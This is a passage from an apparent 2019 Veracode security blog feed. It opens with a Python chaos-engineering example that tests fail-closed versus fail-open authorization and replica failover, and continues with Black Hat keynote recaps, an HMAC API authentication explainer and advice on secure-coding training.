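    """Authorization decision point; the experiment flips `healthy` to inject an outage."""

    def __init__(self):
        self.healthy = True

    def allowed(self, principal, action):
        if not self.healthy:
            raise ConnectionError("authz service unreachable")
        return (principal, action) in POLICY


class Gateway:
    """API front door that consults AuthzService on every request.

    fail_mode="closed" denies while the control is down; fail_mode="open"
    keeps serving, which is the weakness the experiment is meant to surface.
    """

    def __init__(self, authz, fail_mode="closed"):
        self.authz = authz
        self.fail_mode = fail_mode

    def handle(self, principal, action):
        try:
            permitted = self.authz.allowed(principal, action)
        except ConnectionError:
            permitted = self.fail_mode == "open"
        return "allow" if permitted else "deny"


def run_authz_outage_experiment(fail_mode="closed"):
    """Steady state, inject the fault, re-check the hypothesis, roll back."""
    authz = AuthzService()
    gateway = Gateway(authz, fail_mode)

    def invariant():  # security hypothesis: an unauthorized request is never served
        return gateway.handle("mallory", "write") == "deny"

    def available():  # availability signal, reported but not the pass/fail criterion
        return gateway.handle("alice", "read") == "allow"

    report = {"steady_state_ok": invariant() and available()}
    authz.healthy = False  # fault injection: the control goes away
    report["invariant_held_under_fault"] = invariant()
    report["available_under_fault"] = available()
    authz.healthy = True  # rollback
    report["recovered"] = invariant() and available()
    return report


class ReplicaPool:
    """Stateless replicas plus a client that fails over between them."""

    def __init__(self, count):
        self.alive = {f"api-{i}": True for i in range(count)}

    def kill_random(self, rng):
        candidates = [name for name, up in self.alive.items() if up]
        if not candidates:
            return None
        victim = rng.choice(candidates)
        self.alive[victim] = False
        return victim

    def call(self, rng):
        """Try replicas in random order; raise only if none answers."""
        order = list(self.alive)
        rng.shuffle(order)
        for name in order:
            if self.alive[name]:
                return name
        raise ConnectionError("no healthy replica")


def run_replica_kill_experiment(replicas=3, kills=1, requests=100, seed=0):
    """Kill `kills` replicas, then measure the failover client's success rate."""
    rng = random.Random(seed)
    pool = ReplicaPool(replicas)
    killed = [pool.kill_random(rng) for _ in range(kills)]
    served = 0
    for _ in range(requests):
        try:
            pool.call(rng)
            served += 1
        except ConnectionError:
            pass
    return {"killed": killed, "success_rate": served / requests}


if __name__ == "__main__":
    print(run_replica_kill_experiment())
    print(run_authz_outage_experiment("closed"))
    print(run_authz_outage_experiment("open"))
```

The fail-closed gateway passes the security hypothesis and reports degraded availability during the outage; the fail-open gateway stays available and fails the hypothesis, which is the finding you want before a real outage produces it. The replica experiment succeeds as long as one replica survives because the client retries every replica; drop the retry loop and the same experiment exposes the dependency on a single instance.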
Chaos/resilience are natural homes for InfoSec and represent its future, and InfoSec will need to evolve to unify responsibility and accountability.</p> <p>"If not, InfoSec will sit at the kids' table until it is uninvited from the business," Shortridge said. "Giving up control isn't a harbinger of doom. Resilience is a beacon of hope."</p> <p>Stay tuned for more from Black Hat …</p> Thu, 08 Aug 2019 14:04:48 -0400 (lpaine) ver42691 Live From Black Hat USA: Four Key Takeaways from Dino Dai Zovi's Keynote <img src="/sites/default/files/styles/resize_960/public/BH-1-LP_0.png?itok=xt3exeiT" width="960" height="480" typeof="foaf:Image" /><p>"Did you know that your 20th Black Hat is when you get to give the keynote at Black Hat?" Dino Dai Zovi, head of security for Cash App at Square, joked to the packed ballroom. While it may have been Dai Zovi's 20th conference, the topic of his keynote has never been more fitting for where we are in security and the ways in which it mirrors what we experience in our day-to-day life.</p> <p>He gave us an overview of his history: in high school he realized that hacking and security were a lot more like magic than he had previously thought, because it was about figuring out how things work, putting a lot of thought into writing, and making something respond in the way you want it to. In college, he spent his nights, weekends, and spring breaks learning how to find and exploit vulnerabilities in code. And about that time (in 2007) he used his skills to simultaneously prove that Apple's OS X operating system could, indeed, be hacked and win a laptop for his friend in the <a href="">Pwn2Own competition</a>. 
&nbsp;</p> <p>No big deal.</p> <p>Dai Zovi took his work as a security researcher into more corporate organizations, where he learned about the importance of automation, of understanding what is really being asked for in order to solve the right problem, and of ensuring that there is collaboration between security and development to achieve higher-quality outcomes. Here are the four key lessons that Dai Zovi learned as he transitioned from offense to defense.</p> <p><strong>Work backwards from the job: </strong>Dai Zovi talked about how McDonald's was working to understand how they should evolve their milkshake. What they noticed was that people were ordering them in the morning, and they wanted to see why this was happening. In discussions with a customer, the customer indicated that they needed to have breakfast on their morning commute. They had tried a banana, but it wasn't filling enough; a bagel was too dry, and spreading cream cheese while driving was too challenging; in giving doughnuts a shot, they found they were eating too many; but the McDonald's milkshake - unlike other milkshakes - was thick enough to last the full 40-minute drive to work and left them feeling full. As it turns out, the customer was not ordering a milkshake to satisfy hunger, but to cure boredom. Really try to understand your customer: who they are, where they struggle, and what you need to do to provide the best product or solution for them.</p> <p><strong>Seek and apply leverage: </strong>For this story, Dai Zovi took us back to his time with @stake, where when he first started he was essentially fuzzing by hand. He wanted to show off his skills, but he realized that a colleague was completing the same work faster - and finding more vulnerabilities - by using an automated technique (and spending the time saved honing his foosball game). So Dai Zovi followed his lead and found that he was able to find more and do it more effectively. 
By using feedback loops, software, and automation you can really scale your impact.</p> <p><strong>Culture is more powerful than strategy, which is more powerful than tactics:</strong> In one of the organizations he worked in, Dai Zovi was in a conversation with a developer who had been working on a feature but noticed it was coming out… a bit "sketchy." So the developer and the security team whiteboarded the feature and worked together to ensure that it was secure by design (shift left, anyone?). As security leaders, it's important that we focus on the security culture of our organizations. If we can create security culture change in every team, we can scale a lot more powerfully than we can if security is only security's responsibility.</p> <p><strong>Start with yes:</strong> We need to engage the world starting with yes. It keeps the conversation going, it keeps the conversation collaborative, and it keeps the conversation constructive. It says, "I want to work to solve the other problems you have, and I want to make you safe." That's how we create real change and have a real impact.</p> <p>"Why don't all security teams start with yes?" Dai Zovi asked the audience. "Fear. There are lots of reasons to be afraid. But fear misguides us because it's irrational. Fear causes paralysis and creates more insecurity because it often leads to doing nothing."</p> <p>For me, this was the most powerful takeaway. Dai Zovi talked about how he overcame his fear of flying by learning how to skydive. He felt the fear center in his brain activate and assured it that he would be fine: he had the right equipment and knowledge and knew that he would land safely. The more he jumped, the more he proved to his brain that he was safe, and the fear dissipated.</p> <p>Here is a truth about the human brain: we fear being rejected (or not belonging) and change above all else. 
There was a time when being outcast from the community meant certain death, and because change cannot be predicted, it cannot be planned for. As evolved as we have become, our brains have not kept up, and we are all walking around with outdated technology that thinks it should respond to change the same way it responds to being chased by a lion.</p> <p>Ultimately, if we want to strengthen communication we need to first understand that we're all human and assume good intent. Everyone wants to feel safe and they want to belong, and these two desires can stop progress in its tracks. Yet being agile and objective, communicative and collaborative, is essential in today's changing threat landscape. The reality is, we need more innovation and teamwork in development and security - not less. Change is an inevitable part both of life and of keeping software safe - we must be agile in our thinking and in our actions.</p> <p>Stay tuned for more from Black Hat …</p> Wed, 07 Aug 2019 17:10:00 -0400 (lpaine) ver42681 Live From Black Hat USA: Communication's Key Role in Security <img src="/sites/default/files/styles/resize_960/public/BH-2-LP.png?itok=U4MlKCnF" width="960" height="480" typeof="foaf:Image" /><p>The kick-off keynote for the 23rd Black Hat USA Conference in Las Vegas set the stage for the conversations that will undoubtedly be discussed in great detail over the next two days - and likely the next two years - if Black Hat founder Jeff Moss' opening remarks are indicative of a trend. Moss pointed out that security had been asking for the spotlight, both in legislative and more corporate settings, and the industry has had it for the last two years. However, it isn't enough to have the spotlight if you don't know how to harness it. In this case, what Moss was talking about is that how we communicate determines the outcomes we receive. 
He quipped that if you communicate well, then you may find yourself with more budget - and if you communicate poorly, you could find yourself fired.</p> <p>Point taken.</p> <p>Yet defining what cyber or security is remains an ongoing challenge, and Moss notes that oftentimes the language that we use causes us to think of a problem in a certain way, taking us in a direction we don't really want to be heading. He notes that while cyber, or information, is considered the Fifth Domain, it doesn't mean that it is equal to land, sea, air, and space. It's different and requires a different language and level of thinking. You can't use the language and laws of the sea to govern the laws of the Internet or how we engage there, because it is vastly different in nature. It's also vastly different depending on where you're engaging, assuming the Internet isn't simply … everywhere.</p> <p>Moss told a story about how he was speaking with a colleague who told him about how in China, the money is in DDoS protection because attackers are using the "Great Firewall of China" to blackmail other Chinese companies. They're not worried about identity theft because they don't really have it: Chinese farmers sell their identity for 3,000 yen. Meaning that "all of the identities are legit, they're just not the person you think they are."</p> <p>"You might think the Internet works one way, and in one conversation it can flip upside down," Moss told the audience.</p> <p>Simply put: we all have our perceptions, either individually or collectively, about what is needed when it comes to cybersecurity - and we're not communicating effectively about them. In order to fix this problem, we need to reorder the way that we think about things so that we can have more open and effective dialogue. 
As Moss said, "communication is a soft skill that leads to better technical outcomes."</p> <p>Stay tuned for more from Black Hat …</p> Wed, 07 Aug 2019 16:43:42 -0400 (lpaine) ver42676 Detailing Veracode’s HMAC API Authentication <img src="/sites/default/files/styles/resize_960/public/shutterstock_585626381%20%281%29.png?itok=iBA41Rqj" width="960" height="480" typeof="foaf:Image" /><p>Veracode's RESTful APIs use Hash-based Message Authentication Code (HMAC) for authentication, which provides a significant security advantage over basic authentication, where the username and password are sent with every request. Sending the credential itself on every call is not a recommended practice: even over TLS, the long-lived secret is exposed to every proxy or gateway that terminates the connection and to any log that captures request headers. HMAC goes a step further and sends just a per-request signature; the Secret Key that produced it never leaves the client.&nbsp;</p> <p>Developers familiar with Amazon Web Services (AWS) may already have experience with this method of authentication, as it is the primary method used by AWS.&nbsp; In fact, Veracode began providing users the ability to use HMAC authentication with our suite of integration products and Java/C# SDKs in early 2016.</p> <h4><strong>What Is HMAC Authentication?</strong></h4> <p>With Hash-based Message Authentication Code (HMAC), the server and the client share a public ID and a private Secret Key (for more information on obtaining an ID and Secret Key with Veracode, please see our <a href="">help center</a>). &nbsp;Unlike a password with basic authentication, the Secret Key is known by the server and the client but is never transmitted.&nbsp; Rather than sending the Secret Key in the request, the client uses it as the key to a hash function over the request details to generate a unique HMAC signature, which is then sent along with the public ID, a nonce, and additional information. &nbsp;The server receives the request, looks up the Secret Key for that ID, generates its own HMAC over the same inputs, and compares the two - 
if they are equal, the request is authenticated and executed (a process sometimes referred to as the "secret handshake"). &nbsp;Thus, the Secret Key is used to confirm the authenticity and integrity of a request but is never transmitted in that request. The nonce is what makes each signature unique: as long as the server rejects a nonce it has already seen, a captured request cannot simply be replayed, and because the signature covers the request details, an intermediary cannot alter the request without invalidating it. &nbsp;For more information about HMAC, please visit&nbsp;<a href="">this link</a>.</p> <h4><strong>How Does HMAC Authentication Affect Me?</strong></h4> <p>HMAC provides significant security improvements when making API calls to Veracode.&nbsp; While more secure than basic authentication, additional steps are required to perform API calls using HMAC: the client must assemble the same input the server will compute its HMAC over, compute the digest, and attach the ID, nonce, and signature to each request.&nbsp; Veracode minimizes and streamlines the HMAC calculation to make this process simple for users. In fact, there are several examples of HMAC authentication code and sample libraries available for your reference in the Veracode Help Center and on our&nbsp;<a href="">GitHub page</a>:</p> <ul> <li><a href="">Java</a></li> <li><a href="">C#/.NET</a></li> <li><a href="">Python</a>&nbsp;and&nbsp;<a href="">usage example</a></li> <li><a href="">NodeJS</a></li> <li><a href="">Go</a></li> </ul> <p>If you are looking to use curl or a similar command-line tool to execute Veracode API calls, we recommend using<a href="">&nbsp;HTTPie with the Veracode Python Authentication Library</a>.</p> <p>If you have any questions about implementing HMAC and the Veracode ID and Key, please post in the&nbsp;<a href="">Veracode Community Integrations Group</a>&nbsp; - if you haven't yet, you are welcome to <a href="">join the community</a>!&nbsp;</p> Wed, 07 Aug 2019 13:33:02 -0400 (anielsen) ver42671 Grasshoppers, Dead Cow, and Controlled Chaos: What We’re Looking Forward to at Black Hat USA <img src="/sites/default/files/styles/resize_960/public/veracode-blackhat-2019-las-vegas-blog.png?itok=eswOylhY" width="960" height="480" typeof="foaf:Image" /><p>Usually, <a href="//">Black Hat USA </a>is all the rage this time of year when it comes to Las Vegas; however, it seems the excitement about the show has been 
eclipsed by a grasshopper invasion. I admit, I was puzzled when my colleagues informed me of the news and proceeded to show me the <a href="">horrifying photographic and video evidence</a>. I joked that I would need to wear a Veracode-branded beekeeper suit, and wondered what the symbolism of the grasshopper is. So before I get to what you really care about - Black Hat - I leave you with two fun facts:</p> <ol> <li>Upon asking my mother - a Las Vegas resident - about the grasshopper invasion, she informed me that this happens <em>every year</em>, but it usually isn't this bad. And that her side of town has significantly fewer grasshoppers.</li> <li>Grasshoppers can't move sideways or backwards; they can only take big leaps forward. Seems apt when we're considering the future of security and development. &nbsp;</li> </ol> <p>Without further ado, here are three events I'm most looking forward to attending at this year's show:</p> <p><strong>Controlled Chaos: The Inevitable Marriage of DevOps &amp; Security</strong></p> <p>Kelly Shortridge, VP of Product Strategy at Capsule8, and Dr. Nicole Forsgren, Research &amp; Strategy at Google Cloud, will take a closer look at the choice information security has to make when it comes to DevOps: marry their DevOps colleagues and embrace the philosophy of controlled chaos, or eventually lose the race, because software - secure software especially - is a competitive differentiator in today's global economy. I'm curious to see Shortridge and Forsgren's take on DevOps, the concepts of resilience and chaos engineering, and the impact on the future of security programs.</p> <p><strong>Where: </strong>South Pacific <strong>When:</strong> Aug. 7 from 4-4:50 p.m. 
<strong>Read More:</strong> <a href="">Here</a></p> <p><strong>All Things Cult of the Dead Cow</strong></p> <p>Remember when much of the nation was astonished to learn that presidential candidate Beto O'Rourke was a member of America's oldest hacking group, the Cult of the Dead Cow (cDc)? This was after Reuters reporter Joseph Menn published <a href="">a special report</a> that was adapted from his book <em>Cult of the Dead Cow: How the Original Hacking Supergroup Might Just Save the World</em>. While I'll be sure to check out <a href="">the briefing</a> at BHUSA, at Veracode we're excited to host a conversation at our booth about the new book with Menn; Chris Wysopal, Veracode's CTO; Christien Rioux, Software Architect at Flowmill; and Luke Benfey (Deth Veggie), cDc Minister of Propaganda. Plus, we're donating $2 to <a href="">BuildOn</a> for every booth visit.</p> <p><strong>Where:</strong> Booth #854 <strong>When:</strong> Aug. 7 from 5-6:30 p.m. <strong>Read More:&nbsp;</strong><a href="//">Here</a></p> <p><strong>DevSecOps: What, Why and How</strong></p> <p>When it comes to development, security is often added towards the end of the DevOps cycle through a manual or automated review - but we know it doesn't have to be that way. Security can actually be integrated - and automated - at each stage of the DevOps pipeline. In this briefing, Anant Shrivastava from NotSoSecure will dive into the technology and cultural aspects of DevSecOps, and the changes needed to get tangible benefits. Shrivastava will also present case studies on how critical bugs and security breaches affecting popular software and applications could have been prevented using a simple DevSecOps approach.</p> <p><strong>Where:</strong> South Pacific <strong>When:</strong> Aug. 8 from 11-11:50 a.m. 
<strong>Read More:&nbsp;</strong><a href="">Here</a></p> <p>We'd love to talk to you about your own development shop and security practices during the show, so please stop by Booth #854 - we've got demos, <a href="">spun chairs</a>, and we'll send you home with a one-of-a-kind custom t-shirt.</p> <p>I'm not sure I'll be able to score that branded beekeeper suit, but I'm looking forward to seeing everything Black Hat has to offer. If you're open to sharing what you're looking forward to at the show, let's connect on Twitter (<a href="">@lauraleapaine</a>) so I can get your perspective. Make sure to check back here for live coverage - or <a href="">subscribe</a> to get our content updates sent directly to your inbox.</p> Fri, 02 Aug 2019 10:37:25 -0400 (lpaine) ver42461 Key Considerations for Secure Coding Training <img src="/sites/default/files/styles/resize_960/public/shutterstock_481480087.png?itok=uLsZ-InG" width="960" height="480" typeof="foaf:Image" /><p>Developer training has an essential role in reducing code vulnerabilities and avoiding a breach. Effective application security requires both locating security-related defects and fixing them. But developers often simply aren't equipped with the knowledge or skills they need to fix these flaws. Veracode recently sponsored the&nbsp;<a href="//" target="_blank">2017 DevSecOps Global Skills Survey</a>&nbsp;and found that less than one in four developers or other IT pros were required to take a single college course on security. Meanwhile, once developers get on the job, employers aren't advancing their security training options, either. Approximately 68 percent of developers and IT pros say their organizations don't provide them adequate training in application security. The good news is that getting developers the security training they need makes a big difference. 
Data collected for our <a href=""><em>State of Software Security</em> report</a> revealed that <a href="//">eLearning on secure coding</a> improved developer fix rates by 19 percent; even better, <a href="//">remediation coaching</a> improved fix rates by a whopping 88 percent.</p> <p>Clearly, developer training on secure coding is both needed and effective. The following are some key elements to keep in mind when establishing security-training initiatives for development teams.</p> <h4><strong>Consider the channel and the content</strong></h4> <p>Consider employing a variety of training types to accommodate different learning styles and preferences and time zone differences, and to allow for both quick insights and deep dives. For instance, consider self-paced eLearning alongside periodic instructor-led training.</p> <p>In terms of content, ensure the training is both role- and technology-specific. For instance, different programming languages have different security idiosyncrasies, and each has its own propensity for different vulnerability types, so it's important that your training is specific to your language.</p> <h4><strong>Train on-the-job </strong></h4> <p>Reinforce traditional training with on-the-job learning. When developers get instant feedback and learn to code securely as they are actively coding, they create more secure code faster and make fewer security missteps going forward. Some application security testing solutions offer this option. As our director of product marketing notes in a <a href="//">recent blog post</a>, "The security testing serves as a feedback loop for developers and as a gate to stop security defects escaping to production."</p> <p>A recent Forrester report, <a href=""><em>Show, Don't Tell, Your Developers How To Write Secure Code</em></a>, states that "the best application security testing tools … now come with good remediation advice for developers." 
They recommend that you "look for tools that include clickable and brief training modules and can be inserted as early into the SDLC as possible, such as spellchecker-like plug-ins to the integrated developer environment (IDE)."</p> <p>For example, <a href="//">Veracode Greenlight</a>, an IDE- or CI-integrated continuous flaw feedback and secure coding education solution, returns scans in seconds, helping you answer the question "is my code secure?"</p> <p>Greenlight provides on-the-job developer security training through:</p> <ul> <li>Remediation advice with code examples</li> <li>Positive feedback when best practices are followed</li> <li>In-line education, learning as you code</li> </ul> <h4><strong>Embrace security champions</strong></h4> <p>Finally, one of the best ways to reinforce all your security training efforts is to employ <a href="//">security champions</a> on your development teams. A security champion is a developer with an interest in security who helps amplify the security message at the team level. Security champions don't need to be security pros; they just need to act as the security conscience of the team, keeping their eyes and ears open for potential issues. Once the team is aware of these issues, it can then either fix the issues in development or call in your organization's security experts to provide guidance.</p> <p>With a security champion, an organization can make up for a lack of security coverage or skills by empowering a member of the development team to act as a force multiplier who can pass on security best practices, answer questions, and raise security awareness.</p> <h4><strong>Learn more</strong></h4> <p>Get details on additional application security best practices in our new <a href=""><em>Application Security Best Practices Handbook</em></a>.</p> <p>And get tips and tricks on managing your AppSec program from other Veracode customers in our <a href="">Community</a>.</p> Wed, 31 Jul 2019 10:01:56 -0400 (sciccone) ver42421